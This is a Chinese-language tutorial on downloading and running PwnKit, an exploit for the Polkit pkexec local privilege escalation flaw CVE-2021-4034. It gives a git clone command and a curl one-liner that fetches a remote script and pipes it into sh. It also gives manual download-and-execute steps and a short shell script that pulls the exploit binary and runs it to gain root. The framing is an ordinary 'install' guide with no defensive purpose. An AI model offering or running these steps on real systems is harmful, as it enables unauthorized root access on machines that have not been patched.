PwnKit 项目下载及安装教程

1. 项目介绍

PwnKit 是一个针对 CVE-2021-4034 漏洞的自包含漏洞利用工具，该漏洞存在于 Polkit 的 pkexec 程序中，允许本地用户进行权限提升。PwnKit 项目提供了一个简单的脚本，可以在受影响的 Linux 发行版上自动执行权限提升操作。

2. 项目下载位置

PwnKit 项目托管在 GitHub 上，可以通过以下命令从 GitHub 仓库中下载项目：

git clone https://github.com/ly4k/PwnKit.git

3. 项目安装环境配置

3.1 环境要求

PwnKit 项目适用于基于 Ubuntu、Debian、Fedora 和 CentOS 的 Linux 发行版。确保你的系统满足以下要求：

• 受影响的 Polkit 版本（通常是 0.105-26 之前的版本）
• 系统支持 GCC 编译器

3.2 环境配置示例

以下是配置环境的步骤示例：

1. 安装 GCC 编译器

   在 Debian/Ubuntu 系统上，可以使用以下命令安装 GCC：

   sudo apt-get update
   sudo apt-get install gcc
   

   在 Fedora 系统上，可以使用以下命令安装 GCC：

   sudo dnf install gcc
   

2. 检查 Polkit 版本

   使用以下命令检查 Polkit 版本：

   pkexec --version
   

   如果版本低于 0.105-26，则系统可能受影响。

3.3 环境配置图片示例

4. 项目安装方式

PwnKit 项目提供了两种安装方式：自动安装和手动安装。

4.1 自动安装

使用以下命令自动下载并执行 PwnKit 脚本：

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

4.2 手动安装

1. 下载 PwnKit 脚本：

   curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
   

2. 赋予脚本执行权限：

   chmod +x PwnKit
   

3. 执行脚本：

   ./PwnKit
   

5. 项目处理脚本

PwnKit 项目的主要处理脚本是 PwnKit.sh，该脚本会自动检测系统环境并执行权限提升操作。脚本内容如下：

#!/bin/bash

# PwnKit.sh - 自动执行权限提升

# 检查 Polkit 版本
pkexec --version

# 下载并执行 PwnKit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit

通过以上步骤，你可以成功下载并安装 PwnKit 项目，并在受影响的系统上执行权限提升操作。